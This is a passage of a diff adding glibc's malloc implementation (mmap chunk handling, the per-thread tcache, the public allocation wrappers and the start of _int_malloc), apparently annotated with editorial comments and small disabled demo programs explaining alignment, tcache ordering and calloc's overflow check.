+  uintptr_t mem = (uintptr_t) chunk2mem (p);
+  uintptr_t block = (uintptr_t) p - prev_size (p);
+  size_t total_size = prev_size (p) + size;
+  /* Unfortunately we have to do the compiler's job by hand here.  Normally
+     we would test BLOCK and TOTAL-SIZE separately for compliance with the
+     page size.  But gcc does not recognize the optimization possibility
+     (at the moment, at least), so we combine the two values into one before
+     the bit test.  */
+  if (__glibc_unlikely ((block | total_size) & (pagesize - 1)) != 0
+      || __glibc_unlikely (!powerof2 (mem & (pagesize - 1))))
+    malloc_printerr ("munmap_chunk(): invalid pointer");
+
+  atomic_decrement (&mp_.n_mmaps);
+  atomic_add (&mp_.mmapped_mem, -total_size);
+
+  /* If munmap failed the process virtual memory address space is in a
+     bad shape.  Just leave the block hanging around, the process will
+     terminate shortly anyway since not much can be done.  */
+  __munmap ((char *) block, total_size);
+}
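+
+/* Editorial illustration (not part of glibc): for chunks created on the
+   sysmalloc() mmap path above, prev_size (p) holds the front-alignment
+   correction (0 if the mapping was already aligned), so
+
+     block      == (uintptr_t) p - prev_size (p)    the original mmap base
+     total_size == prev_size (p) + chunksize (p)    the original mapping length
+
+   Both are page aligned, which is what the combined
+   (block | total_size) & (pagesize - 1) test above verifies.  */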
+
+#if HAVE_MREMAP
+
+static mchunkptr
+mremap_chunk (mchunkptr p, size_t new_size)
+{
+  size_t pagesize = GLRO (dl_pagesize);
+  INTERNAL_SIZE_T offset = prev_size (p);
+  INTERNAL_SIZE_T size = chunksize (p);
+  char *cp;
+
+  assert (chunk_is_mmapped (p));
+
+  uintptr_t block = (uintptr_t) p - offset;
+  uintptr_t mem = (uintptr_t) chunk2mem(p);
+  size_t total_size = offset + size;
+  if (__glibc_unlikely ((block | total_size) & (pagesize - 1)) != 0
+      || __glibc_unlikely (!powerof2 (mem & (pagesize - 1))))
+    malloc_printerr("mremap_chunk(): invalid pointer");
+
+  /* Note the extra SIZE_SZ overhead as in mmap_chunk(). */
+  new_size = ALIGN_UP (new_size + offset + SIZE_SZ, pagesize);
+
+  /* No need to remap if the number of pages does not change.  */
+  if (total_size == new_size)
+    return p;
+
+  cp = (char *) __mremap ((char *) block, total_size, new_size,
+                          MREMAP_MAYMOVE);
+
+  if (cp == MAP_FAILED)
+    return 0;
+
+  p = (mchunkptr) (cp + offset);
+
+  assert (aligned_OK (chunk2mem (p)));
+
+  assert (prev_size (p) == offset);
+  set_head (p, (new_size - offset) | IS_MMAPPED);
+
+  INTERNAL_SIZE_T new;
+  new = atomic_exchange_and_add (&mp_.mmapped_mem, new_size - size - offset)
+        + new_size - size - offset;
+  atomic_max (&mp_.max_mmapped_mem, new);
+  return p;
+}
+#endif /* HAVE_MREMAP */
+
+/*------------------------ Public wrappers. --------------------------------*/
+
+#if USE_TCACHE
+
+/* We overlay this structure on the user-data portion of a chunk when
+   the chunk is stored in the per-thread cache.  */
+typedef struct tcache_entry
+{
+  struct tcache_entry *next;
+  /* This field exists to detect double frees.  */
+  struct tcache_perthread_struct *key;
+} tcache_entry;
+
+/* There is one of these for each thread, which contains the
+   per-thread cache (hence "tcache_perthread_struct").  Keeping
+   overall size low is mildly important.  Note that COUNTS and ENTRIES
+   are redundant (we could have just counted the linked list each
+   time); this is done for performance reasons.  */
+typedef struct tcache_perthread_struct
+{
+  uint16_t counts[TCACHE_MAX_BINS];
+  tcache_entry *entries[TCACHE_MAX_BINS];
+} tcache_perthread_struct;
+
+static __thread bool tcache_shutting_down = false;
+static __thread tcache_perthread_struct *tcache = NULL;
+
+/* Caller must ensure that we know tc_idx is valid and there's room
+   for more chunks.  */
+static __always_inline void
+tcache_put (mchunkptr chunk, size_t tc_idx)
+{
+  tcache_entry *e = (tcache_entry *) chunk2mem (chunk);
+
+  /* Mark this chunk as "in the tcache" so the test in _int_free will
+     detect a double free.  */
+  e->key = tcache;
+
+  e->next = tcache->entries[tc_idx];
+  tcache->entries[tc_idx] = e;
+  ++(tcache->counts[tc_idx]);
+}
+
+/* Caller must ensure that we know tc_idx is valid and there's
+   available chunks to remove.  */
+static __always_inline void *
+tcache_get (size_t tc_idx)
+{
+  tcache_entry *e = tcache->entries[tc_idx];
+  tcache->entries[tc_idx] = e->next;
+  --(tcache->counts[tc_idx]);
+  e->key = NULL;
+  return (void *) e;
+}
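+
+/* Editorial illustration (not part of glibc): each tcache bin is a LIFO
+   singly linked list threaded through the user-data area of the cached
+   chunks.  After two same-sized chunks A then B are stored in bin i via
+   tcache_put():
+
+     tcache->entries[i] -> B -> A -> NULL        counts[i] == 2
+
+   and a subsequent tcache_get (i) returns B first.  The key stamp
+   written by tcache_put() is what the double-free detection mentioned
+   in the tcache_entry comment relies on: a chunk whose key still equals
+   the current tcache is likely already cached.  */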
+
+static void
+tcache_thread_shutdown (void)
+{
+  int i;
+  tcache_perthread_struct *tcache_tmp = tcache;
+
+  if (!tcache)
+    return;
+
+  /* Disable the tcache and prevent it from being reinitialized.  */
+  tcache = NULL;
+  tcache_shutting_down = true;
+
+  /* Free all of the entries and the tcache itself back to the arena
+     heap for coalescing.  */
+  for (i = 0; i < TCACHE_MAX_BINS; ++i)
+    {
+      while (tcache_tmp->entries[i])
+	{
+	  tcache_entry *e = tcache_tmp->entries[i];
+	  tcache_tmp->entries[i] = e->next;
+	  __libc_free (e);
+	}
+    }
+
+  __libc_free (tcache_tmp);
+}
+
+static void
+tcache_init(void)
+{
+  mstate ar_ptr;
+  void *victim = 0;
+  const size_t bytes = sizeof (tcache_perthread_struct);
+
+  if (tcache_shutting_down)
+    return;
+
+  arena_get (ar_ptr, bytes);
+  victim = _int_malloc (ar_ptr, bytes);
+  if (!victim && ar_ptr != NULL)
+    {
+      ar_ptr = arena_get_retry (ar_ptr, bytes);
+      victim = _int_malloc (ar_ptr, bytes);
+    }
+
+
+  if (ar_ptr != NULL)
+    __libc_lock_unlock (ar_ptr->mutex);
+
+  /* In a low memory situation, we may not be able to allocate memory
+     - in which case, we just keep trying later.  However, we
+     typically do this very early, so either there is sufficient
+     memory, or there isn't enough memory to do non-trivial
+     allocations anyway.  */
+  if (victim)
+    {
+      tcache = (tcache_perthread_struct *) victim;
+      memset (tcache, 0, sizeof (tcache_perthread_struct));
+    }
+
+}
+
+# define MAYBE_INIT_TCACHE() \
+  if (__glibc_unlikely (tcache == NULL)) \
+    tcache_init();
+
+#else  /* !USE_TCACHE */
+# define MAYBE_INIT_TCACHE()
+
+static void
+tcache_thread_shutdown (void)
+{
+  /* Nothing to do if there is no thread cache.  */
+}
+
+#endif /* !USE_TCACHE  */
+
+void *
+__libc_malloc (size_t bytes)
+{
+  mstate ar_ptr;
+  void *victim;
+
+  _Static_assert (PTRDIFF_MAX <= SIZE_MAX / 2,
+                  "PTRDIFF_MAX is not more than half of SIZE_MAX");
+
+  void *(*hook) (size_t, const void *)
+    = atomic_forced_read (__malloc_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    return (*hook)(bytes, RETURN_ADDRESS (0));
+#if USE_TCACHE
+  /* int_free also calls request2size, be careful to not pad twice.  */
+  size_t tbytes;
+  if (!checked_request2size (bytes, &tbytes))
+    {
+      __set_errno (ENOMEM);
+      return NULL;
+    }
+  size_t tc_idx = csize2tidx (tbytes);
+
+  MAYBE_INIT_TCACHE ();
+
+  DIAG_PUSH_NEEDS_COMMENT;
+  if (tc_idx < mp_.tcache_bins
+      && tcache
+      && tcache->counts[tc_idx] > 0)
+    {
+      return tcache_get (tc_idx);
+    }
+  DIAG_POP_NEEDS_COMMENT;
+#endif
+
+  if (SINGLE_THREAD_P)
+    {
+      victim = _int_malloc (&main_arena, bytes);
+      assert (!victim || chunk_is_mmapped (mem2chunk (victim)) ||
+	      &main_arena == arena_for_chunk (mem2chunk (victim)));
+      return victim;
+    }
+
+  arena_get (ar_ptr, bytes);
+
+  victim = _int_malloc (ar_ptr, bytes);
+  /* Retry with another arena only if we were able to find a usable arena
+     before.  */
+  if (!victim && ar_ptr != NULL)
+    {
+      LIBC_PROBE (memory_malloc_retry, 1, bytes);
+      ar_ptr = arena_get_retry (ar_ptr, bytes);
+      victim = _int_malloc (ar_ptr, bytes);
+    }
+
+  if (ar_ptr != NULL)
+    __libc_lock_unlock (ar_ptr->mutex);
+
+  assert (!victim || chunk_is_mmapped (mem2chunk (victim)) ||
+          ar_ptr == arena_for_chunk (mem2chunk (victim)));
+  return victim;
+}
+libc_hidden_def (__libc_malloc)
+
+void
+__libc_free (void *mem)
+{
+  mstate ar_ptr;
+  mchunkptr p;                          /* chunk corresponding to mem */
+
+  void (*hook) (void *, const void *)
+    = atomic_forced_read (__free_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    {
+      (*hook)(mem, RETURN_ADDRESS (0));
+      return;
+    }
+
+  if (mem == 0)                              /* free(0) has no effect */
+    return;
+
+  p = mem2chunk (mem);
+
+  if (chunk_is_mmapped (p))                       /* release mmapped memory. */
+    {
+      /* See if the dynamic brk/mmap threshold needs adjusting.
+	 Dumped fake mmapped chunks do not affect the threshold.  */
+      if (!mp_.no_dyn_threshold
+          && chunksize_nomask (p) > mp_.mmap_threshold
+          && chunksize_nomask (p) <= DEFAULT_MMAP_THRESHOLD_MAX
+	  && !DUMPED_MAIN_ARENA_CHUNK (p))
+        {
+          mp_.mmap_threshold = chunksize (p);
+          mp_.trim_threshold = 2 * mp_.mmap_threshold;
+          LIBC_PROBE (memory_mallopt_free_dyn_thresholds, 2,
+                      mp_.mmap_threshold, mp_.trim_threshold);
+        }
+      munmap_chunk (p);
+      return;
+    }
+
+  MAYBE_INIT_TCACHE ();
+
+  ar_ptr = arena_for_chunk (p);
+  _int_free (ar_ptr, p, 0);
+}
+libc_hidden_def (__libc_free)
+
+void *
+__libc_realloc (void *oldmem, size_t bytes)
+{
+  mstate ar_ptr;
+  INTERNAL_SIZE_T nb;         /* padded request size */
+
+  void *newp;             /* chunk to return */
+
+  void *(*hook) (void *, size_t, const void *) =
+    atomic_forced_read (__realloc_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    return (*hook)(oldmem, bytes, RETURN_ADDRESS (0));
+
+#if REALLOC_ZERO_BYTES_FREES
+  if (bytes == 0 && oldmem != NULL)
+    {
+      __libc_free (oldmem); return 0;
+    }
+#endif
+
+  /* realloc of null is supposed to be same as malloc */
+  if (oldmem == 0)
+    return __libc_malloc (bytes);
+
+  /* chunk corresponding to oldmem */
+  const mchunkptr oldp = mem2chunk (oldmem);
+  /* its size */
+  const INTERNAL_SIZE_T oldsize = chunksize (oldp);
+
+  if (chunk_is_mmapped (oldp))
+    ar_ptr = NULL;
+  else
+    {
+      MAYBE_INIT_TCACHE ();
+      ar_ptr = arena_for_chunk (oldp);
+    }
+
+  /* Little security check which won't hurt performance: the allocator
+     never wraps around at the end of the address space.  Therefore
+     we can exclude some size values which might appear here by
+     accident or by "design" from some intruder.  We need to bypass
+     this check for dumped fake mmap chunks from the old main arena
+     because the new malloc may provide additional alignment.  */
+  if ((__builtin_expect ((uintptr_t) oldp > (uintptr_t) -oldsize, 0)
+       || __builtin_expect (misaligned_chunk (oldp), 0))
+      && !DUMPED_MAIN_ARENA_CHUNK (oldp))
+      malloc_printerr ("realloc(): invalid pointer");
+
+  if (!checked_request2size (bytes, &nb))
+    {
+      __set_errno (ENOMEM);
+      return NULL;
+    }
+
+  if (chunk_is_mmapped (oldp))
+    {
+      /* If this is a faked mmapped chunk from the dumped main arena,
+	 always make a copy (and do not free the old chunk).  */
+      if (DUMPED_MAIN_ARENA_CHUNK (oldp))
+	{
+	  /* Must alloc, copy, free. */
+	  void *newmem = __libc_malloc (bytes);
+	  if (newmem == 0)
+	    return NULL;
+	  /* Copy as many bytes as are available from the old chunk
+	     and fit into the new size.  NB: The overhead for faked
+	     mmapped chunks is only SIZE_SZ, not 2 * SIZE_SZ as for
+	     regular mmapped chunks.  */
+	  if (bytes > oldsize - SIZE_SZ)
+	    bytes = oldsize - SIZE_SZ;
+	  memcpy (newmem, oldmem, bytes);
+	  return newmem;
+	}
+
+      void *newmem;
+
+#if HAVE_MREMAP
+      newp = mremap_chunk (oldp, nb);
+      if (newp)
+        return chunk2mem (newp);
+#endif
+      /* Note the extra SIZE_SZ overhead. */
+      if (oldsize - SIZE_SZ >= nb)
+        return oldmem;                         /* do nothing */
+
+      /* Must alloc, copy, free. */
+      newmem = __libc_malloc (bytes);
+      if (newmem == 0)
+        return 0;              /* propagate failure */
+
+      memcpy (newmem, oldmem, oldsize - 2 * SIZE_SZ);
+      munmap_chunk (oldp);
+      return newmem;
+    }
+
+  if (SINGLE_THREAD_P)
+    {
+      newp = _int_realloc (ar_ptr, oldp, oldsize, nb);
+      assert (!newp || chunk_is_mmapped (mem2chunk (newp)) ||
+	      ar_ptr == arena_for_chunk (mem2chunk (newp)));
+
+      return newp;
+    }
+
+  __libc_lock_lock (ar_ptr->mutex);
+
+  newp = _int_realloc (ar_ptr, oldp, oldsize, nb);
+
+  __libc_lock_unlock (ar_ptr->mutex);
+  assert (!newp || chunk_is_mmapped (mem2chunk (newp)) ||
+          ar_ptr == arena_for_chunk (mem2chunk (newp)));
+
+  if (newp == NULL)
+    {
+      /* Try harder to allocate memory in other arenas.  */
+      LIBC_PROBE (memory_realloc_retry, 2, bytes, oldmem);
+      newp = __libc_malloc (bytes);
+      if (newp != NULL)
+        {
+          memcpy (newp, oldmem, oldsize - SIZE_SZ);
+          _int_free (ar_ptr, oldp, 0);
+        }
+    }
+
+  return newp;
+}
+libc_hidden_def (__libc_realloc)
+
+void *
+__libc_memalign (size_t alignment, size_t bytes)
+{
+  void *address = RETURN_ADDRESS (0);
+  return _mid_memalign (alignment, bytes, address);
+}
+
+static void *
+_mid_memalign (size_t alignment, size_t bytes, void *address)
+{
+  mstate ar_ptr;
+  void *p;
+
+  void *(*hook) (size_t, size_t, const void *) =
+    atomic_forced_read (__memalign_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    return (*hook)(alignment, bytes, address);
+
+  /* If we need less alignment than we give anyway, just relay to malloc.  */
+  if (alignment <= MALLOC_ALIGNMENT)
+    return __libc_malloc (bytes);
+
+  /* Otherwise, ensure that it is at least a minimum chunk size */
+  if (alignment < MINSIZE)
+    alignment = MINSIZE;
+
+  /* If the alignment is greater than SIZE_MAX / 2 + 1 it cannot be a
+     power of 2 and will cause overflow in the check below.  */
+  if (alignment > SIZE_MAX / 2 + 1)
+    {
+      __set_errno (EINVAL);
+      return 0;
+    }
+
+
+  /* Make sure alignment is power of 2.  */
+  if (!powerof2 (alignment))
+    {
+      size_t a = MALLOC_ALIGNMENT * 2;
+      while (a < alignment)
+        a <<= 1;
+      alignment = a;
+    }
+
+  if (SINGLE_THREAD_P)
+    {
+      p = _int_memalign (&main_arena, alignment, bytes);
+      assert (!p || chunk_is_mmapped (mem2chunk (p)) ||
+	      &main_arena == arena_for_chunk (mem2chunk (p)));
+
+      return p;
+    }
+
+  arena_get (ar_ptr, bytes + alignment + MINSIZE);
+
+  p = _int_memalign (ar_ptr, alignment, bytes);
+  if (!p && ar_ptr != NULL)
+    {
+      LIBC_PROBE (memory_memalign_retry, 2, bytes, alignment);
+      ar_ptr = arena_get_retry (ar_ptr, bytes);
+      p = _int_memalign (ar_ptr, alignment, bytes);
+    }
+
+  if (ar_ptr != NULL)
+    __libc_lock_unlock (ar_ptr->mutex);
+
+  assert (!p || chunk_is_mmapped (mem2chunk (p)) ||
+          ar_ptr == arena_for_chunk (mem2chunk (p)));
+  return p;
+}
+/* For ISO C11.  */
+weak_alias (__libc_memalign, aligned_alloc)
+libc_hidden_def (__libc_memalign)
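+
+/* [Editor's aside -- illustrative sketch, not part of glibc.]  A short
+   usage demo for the wrapper above: _mid_memalign passes power-of-two
+   alignments through and rounds anything else up to the next power of
+   two, and because aligned_alloc is a plain alias of __libc_memalign,
+   C11's "size must be a multiple of alignment" rule is not enforced
+   here.  Kept under "#if 0"; build it as a separate program.  */
+#if 0
+#include <malloc.h>             /* memalign */
+#include <stdio.h>
+#include <stdlib.h>
+
+int
+main (void)
+{
+  /* Ask for 0x100-byte alignment; the low byte of the result is zero.  */
+  void *p = memalign (0x100, 100);
+  printf ("memalign(0x100, 100) = %p, low byte = %#lx\n",
+          p, (unsigned long) p & 0xff);
+  free (p);
+  return 0;
+}
+#endif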
+
+void *
+__libc_valloc (size_t bytes)
+{
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  void *address = RETURN_ADDRESS (0);
+  size_t pagesize = GLRO (dl_pagesize);
+  return _mid_memalign (pagesize, bytes, address);
+}
+
+void *
+__libc_pvalloc (size_t bytes)
+{
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  void *address = RETURN_ADDRESS (0);
+  size_t pagesize = GLRO (dl_pagesize);
+  size_t rounded_bytes;
+  /* ALIGN_UP with overflow check.  */
+  if (__glibc_unlikely (__builtin_add_overflow (bytes,
+						pagesize - 1,
+						&rounded_bytes)))
+    {
+      __set_errno (ENOMEM);
+      return 0;
+    }
+  rounded_bytes = rounded_bytes & -(pagesize - 1);
+
+  return _mid_memalign (pagesize, rounded_bytes, address);
+}
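+
+/* [Editor's aside -- illustrative sketch, not part of glibc.]  valloc()
+   above only page-aligns the start of the block, while pvalloc() also
+   rounds the request itself up to a whole page; malloc_usable_size()
+   makes the difference visible.  Assumes a 4096-byte page; kept under
+   "#if 0" and meant to be built as a separate program.  */
+#if 0
+#include <malloc.h>             /* pvalloc, malloc_usable_size */
+#include <stdio.h>
+#include <stdlib.h>             /* valloc */
+
+int
+main (void)
+{
+  void *v = valloc (100);       /* page-aligned, usable size slightly over 100 */
+  void *p = pvalloc (100);      /* page-aligned, usable size >= one page */
+  printf ("valloc(100)  = %p, usable %zu\n", v, malloc_usable_size (v));
+  printf ("pvalloc(100) = %p, usable %zu\n", p, malloc_usable_size (p));
+  free (v);
+  free (p);
+  return 0;
+}
+#endif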
+
+void *
+__libc_calloc (size_t n, size_t elem_size)
+{
+  mstate av;
+  mchunkptr oldtop, p;
+  INTERNAL_SIZE_T sz, csz, oldtopsize;
+  void *mem;
+  unsigned long clearsize;
+  unsigned long nclears;
+  INTERNAL_SIZE_T *d;
+  ptrdiff_t bytes;
+
+  if (__glibc_unlikely (__builtin_mul_overflow (n, elem_size, &bytes)))
+    {
+       __set_errno (ENOMEM);
+       return NULL;
+    }
+  sz = bytes;
+
+  void *(*hook) (size_t, const void *) =
+    atomic_forced_read (__malloc_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    {
+      mem = (*hook)(sz, RETURN_ADDRESS (0));
+      if (mem == 0)
+        return 0;
+
+      return memset (mem, 0, sz);
+    }
+
+  MAYBE_INIT_TCACHE ();
+
+  if (SINGLE_THREAD_P)
+    av = &main_arena;
+  else
+    arena_get (av, sz);
+
+  if (av)
+    {
+      /* Check if we hand out the top chunk, in which case there may be no
+	 need to clear. */
+#if MORECORE_CLEARS
+      oldtop = top (av);
+      oldtopsize = chunksize (top (av));
+# if MORECORE_CLEARS < 2
+      /* Only newly allocated memory is guaranteed to be cleared.  */
+      if (av == &main_arena &&
+	  oldtopsize < mp_.sbrk_base + av->max_system_mem - (char *) oldtop)
+	oldtopsize = (mp_.sbrk_base + av->max_system_mem - (char *) oldtop);
+# endif
+      if (av != &main_arena)
+	{
+	  heap_info *heap = heap_for_ptr (oldtop);
+	  if (oldtopsize < (char *) heap + heap->mprotect_size - (char *) oldtop)
+	    oldtopsize = (char *) heap + heap->mprotect_size - (char *) oldtop;
+	}
+#endif
+    }
+  else
+    {
+      /* No usable arenas.  */
+      oldtop = 0;
+      oldtopsize = 0;
+    }
+  mem = _int_malloc (av, sz);
+
+  assert (!mem || chunk_is_mmapped (mem2chunk (mem)) ||
+          av == arena_for_chunk (mem2chunk (mem)));
+
+  if (!SINGLE_THREAD_P)
+    {
+      if (mem == 0 && av != NULL)
+	{
+	  LIBC_PROBE (memory_calloc_retry, 1, sz);
+	  av = arena_get_retry (av, sz);
+	  mem = _int_malloc (av, sz);
+	}
+
+      if (av != NULL)
+	__libc_lock_unlock (av->mutex);
+    }
+
+  /* Allocation failed even after a retry.  */
+  if (mem == 0)
+    return 0;
+
+  p = mem2chunk (mem);
+
+  /* Two optional cases in which clearing is not necessary */
+  if (chunk_is_mmapped (p))
+    {
+      if (__builtin_expect (perturb_byte, 0))
+        return memset (mem, 0, sz);
+
+      return mem;
+    }
+
+  csz = chunksize (p);
+
+#if MORECORE_CLEARS
+  if (perturb_byte == 0 && (p == oldtop && csz > oldtopsize))
+    {
+      /* clear only the bytes from non-freshly-sbrked memory */
+      csz = oldtopsize;
+    }
+#endif
+
+  /* Unroll clear of <= 36 bytes (72 if 8-byte sizes).  We know that
+     contents have an odd number of INTERNAL_SIZE_T-sized words;
+     minimally 3.  */
+  d = (INTERNAL_SIZE_T *) mem;
+  clearsize = csz - SIZE_SZ;
+  nclears = clearsize / sizeof (INTERNAL_SIZE_T);
+  assert (nclears >= 3);
+
+  if (nclears > 9)
+    return memset (d, 0, clearsize);
+
+  else
+    {
+      *(d + 0) = 0;
+      *(d + 1) = 0;
+      *(d + 2) = 0;
+      if (nclears > 4)
+        {
+          *(d + 3) = 0;
+          *(d + 4) = 0;
+          if (nclears > 6)
+            {
+              *(d + 5) = 0;
+              *(d + 6) = 0;
+              if (nclears > 8)
+                {
+                  *(d + 7) = 0;
+                  *(d + 8) = 0;
+                }
+            }
+        }
+    }
+
+  return mem;
+}
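+
+/* [Editor's aside -- illustrative sketch, not part of glibc.]  The
+   __builtin_mul_overflow check at the top of __libc_calloc is what makes
+   calloc (n, size) safe against multiplication overflow; a hand-rolled
+   malloc (n * size) simply wraps.  Standalone demo, kept under "#if 0";
+   the wrapped product assumes a 64-bit size_t.  */
+#if 0
+#include <errno.h>
+#include <stdint.h>
+#include <stdio.h>
+#include <stdlib.h>
+
+int
+main (void)
+{
+  size_t n = SIZE_MAX / 2 + 1;  /* n * 2 wraps around to 0 */
+
+  void *a = calloc (n, 2);      /* overflow detected: NULL, errno ENOMEM */
+  printf ("calloc (n, 2)  -> %p (errno %d)\n", a, errno);
+
+  void *b = malloc (n * 2);     /* n * 2 == 0: a minimum-sized chunk */
+  printf ("malloc (n * 2) -> %p\n", b);
+  free (b);
+  return 0;
+}
+#endif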
+
+/*
+   ------------------------------ malloc ------------------------------
+ */
+
+static void *
+_int_malloc (mstate av, size_t bytes)
+{
+  INTERNAL_SIZE_T nb;               /* normalized request size */
+  unsigned int idx;                 /* associated bin index */
+  mbinptr bin;                      /* associated bin */
+
+  mchunkptr victim;                 /* inspected/selected chunk */
+  INTERNAL_SIZE_T size;             /* its size */
+  int victim_index;                 /* its bin index */
+
+  mchunkptr remainder;              /* remainder from a split */
+  unsigned long remainder_size;     /* its size */
+
+  unsigned int block;               /* bit map traverser */
+  unsigned int bit;                 /* bit map traverser */
+  unsigned int map;                 /* current word of binmap */
+
+  mchunkptr fwd;                    /* misc temp for linking */
+  mchunkptr bck;                    /* misc temp for linking */
+
+#if USE_TCACHE
+  size_t tcache_unsorted_count;	    /* count of unsorted chunks processed */
+#endif
+
+  /*
+     Convert request size to internal form by adding SIZE_SZ bytes
+     overhead plus possibly more to obtain necessary alignment and/or
+     to obtain a size of at least MINSIZE, the smallest allocatable
+     size. Also, checked_request2size returns false for request sizes
+     that are so large that they wrap around zero when padded and
+     aligned.
+   */
+
+  if (!checked_request2size (bytes, &nb))
+    {
+      __set_errno (ENOMEM);
+      return NULL;
+    }
+
+  /* There are no usable arenas.  Fall back to sysmalloc to get a chunk from
+     mmap.  */
+  if (__glibc_unlikely (av == NULL))
+    {
+      void *p = sysmalloc (nb, av);
+      if (p != NULL)
+	alloc_perturb (p, bytes);
+      return p;
+    }
+
+  /*
+     If the size qualifies as a fastbin, first check corresponding bin.
+     This code is safe to execute even if av is not yet initialized, so we
+     can try it without checking, which saves some time on this fast path.
+   */
+
+#define REMOVE_FB(fb, victim, pp)			\
+  do							\
+    {							\
+      victim = pp;					\
+      if (victim == NULL)				\
+	break;						\
+    }							\
+  while ((pp = catomic_compare_and_exchange_val_acq (fb, victim->fd, victim)) \
+	 != victim);					\
+
+  if ((unsigned long) (nb) <= (unsigned long) (get_max_fast ()))
+    {
+      idx = fastbin_index (nb);
+      mfastbinptr *fb = &fastbin (av, idx);
+      mchunkptr pp;
+      victim = *fb;
+
+      if (victim != NULL)
+	{
+	  if (SINGLE_THREAD_P)
+	    *fb = victim->fd;
+	  else
+	    REMOVE_FB (fb, pp, victim);
+	  if (__glibc_likely (victim != NULL))
+	    {
+	      size_t victim_idx = fastbin_index (chunksize (victim));
+	      if (__builtin_expect (victim_idx != idx, 0))
+		malloc_printerr ("malloc(): memory corruption (fast)");
+	      check_remalloced_chunk (av, victim, nb);
+#if USE_TCACHE
+	      /* While we're here, if we see other chunks of the same size,
+		 stash them in the tcache.  */
+	      size_t tc_idx = csize2tidx (nb);
+	      if (tcache && tc_idx < mp_.tcache_bins)
+		{
+		  mchunkptr tc_victim;
+
+		  /* While bin not empty and tcache not full, copy chunks.  */
+		  while (tcache->counts[tc_idx] < mp_.tcache_count
+			 && (tc_victim = *fb) != NULL)
+		    {
+		      if (SINGLE_THREAD_P)
+			*fb = tc_victim->fd;
+		      else
+			{
+			  REMOVE_FB (fb, pp, tc_victim);
+			  if (__glibc_unlikely (tc_victim == NULL))
+			    break;
+			}
+		      tcache_put (tc_victim, tc_idx);
+		    }
+		}
+#endif
+	      void *p = chunk2mem (victim);
+	      alloc_perturb (p, bytes);
+	      return p;
+	    }
+	}
+    }
+
+  /*
+     If a small request, check regular bin.  Since these "smallbins"
+     hold one size each, no searching within bins is necessary.
+     (For a large request, we need to wait until unsorted chunks are
+     processed to find best fit. But for small ones, fits are exact
+     anyway, so we can check now, which is faster.)
+   */
+
+  if (in_smallbin_range (nb))
+    {
+      idx = smallbin_index (nb);
+      bin = bin_at (av, idx);
+
+      if ((victim = last (bin)) != bin)
+        {
+          bck = victim->bk;
+	  if (__glibc_unlikely (bck->fd != victim))
+	    malloc_printerr ("malloc(): smallbin double linked list corrupted");
+          set_inuse_bit_at_offset (victim, nb);
+          bin->bk = bck;
+          bck->fd = bin;
+
+          if (av != &main_arena)
+	    set_non_main_arena (victim);
+          check_malloced_chunk (av, victim, nb);
+#if USE_TCACHE
+	  /* While we're here, if we see other chunks of the same size,
+	     stash them in the tcache.  */
+	  size_t tc_idx = csize2tidx (nb);
+	  if (tcache && tc_idx < mp_.tcache_bins)
+	    {
+	      mchunkptr tc_victim;
+
+	      /* While bin not empty and tcache not full, copy chunks over.  */
+	      while (tcache->counts[tc_idx] < mp_.tcache_count
+		     && (tc_victim = last (bin)) != bin)
+		{
+		  if (tc_victim != 0)
+		    {
+		      bck = tc_victim->bk;
+		      set_inuse_bit_at_offset (tc_victim, nb);
+		      if (av != &main_arena)
+			set_non_main_arena (tc_victim);
+		      bin->bk = bck;
+		      bck->fd = bin;
+
+		      tcache_put (tc_victim, tc_idx);
+	            }
+		}
+	    }
+#endif
+          void *p = chunk2mem (victim);
+          alloc_perturb (p, bytes);
+          return p;
+        }
+    }
+
+  /*
+     If this is a large request, consolidate fastbins before continuing.
+     While it might look excessive to kill all fastbins before
+     even seeing if there is space available, this avoids
+     fragmentation problems normally associated with fastbins.
+     Also, in practice, programs tend to have runs of either small or
+     large requests, but less often mixtures, so consolidation is not
+     invoked all that often in most programs. And the programs in which
+     it is called frequently otherwise tend to fragment.
+   */
+
+  else
+    {
+      idx = largebin_index (nb);
+      if (atomic_load_relaxed (&av->have_fastchunks))
+        malloc_consolidate (av);
+    }
+
+  /*
+     Process recently freed or remaindered chunks, taking one only if
+     it is an exact fit, or, if this is a small request, the chunk is the
+     remainder from the most recent non-exact fit.  Place other traversed
+     chunks in bins.  Note that this step is the only place in any routine
+     where chunks are placed in bins.
+
+     The outer loop here is needed because we might not realize until
+     near the end of malloc that we should have consolidated, so must
+     do so and retry. This happens at most once, and only when we would
+     otherwise need to expand memory to service a "small" request.
+   */
+
+#if USE_TCACHE
+  INTERNAL_SIZE_T tcache_nb = 0;
+  size_t tc_idx = csize2tidx (nb);
+  if (tcache && tc_idx < mp_.tcache_bins)
+    tcache_nb = nb;
+  int return_cached = 0;
+
+  tcache_unsorted_count = 0;
+#endif
+
+  for (;; )
+    {
+      int iters = 0;
+      while ((victim = unsorted_chunks (av)->bk) != unsorted_chunks (av))
+        {
+          bck = victim->bk;
+          size = chunksize (victim);
+          mchunkptr next = chunk_at_offset (victim, size);
+
+          if (__glibc_unlikely (size <= 2 * SIZE_SZ)
+              || __glibc_unlikely (size > av->system_mem))
+            malloc_printerr ("malloc(): invalid size (unsorted)");
+          if (__glibc_unlikely (chunksize_nomask (next) < 2 * SIZE_SZ)
+              || __glibc_unlikely (chunksize_nomask (next) > av->system_mem))
+            malloc_printerr ("malloc(): invalid next size (unsorted)");
+          if (__glibc_unlikely ((prev_size (next) & ~(SIZE_BITS)) != size))
+            malloc_printerr ("malloc(): mismatching next->prev_size (unsorted)");
+          if (__glibc_unlikely (bck->fd != victim)
+              || __glibc_unlikely (victim->fd != unsorted_chunks (av)))
+            malloc_printerr ("malloc(): unsorted double linked list corrupted");
+          if (__glibc_unlikely (prev_inuse (next)))
+            malloc_printerr ("malloc(): invalid next->prev_inuse (unsorted)");
+
+          /*
+             If a small request, try to use last remainder if it is the
+             only chunk in unsorted bin.  This helps promote locality for
+             runs of consecutive small requests. This is the only
+             exception to best-fit, and applies only when there is
+             no exact fit for a small chunk.
+           */
+
+          if (in_smallbin_range (nb) &&
+              bck == unsorted_chunks (av) &&
+              victim == av->last_remainder &&
+              (unsigned long) (size) > (unsigned long) (nb + MINSIZE))
+            {
+              /* split and reattach remainder */
+              remainder_size = size - nb;
+              remainder = chunk_at_offset (victim, nb);
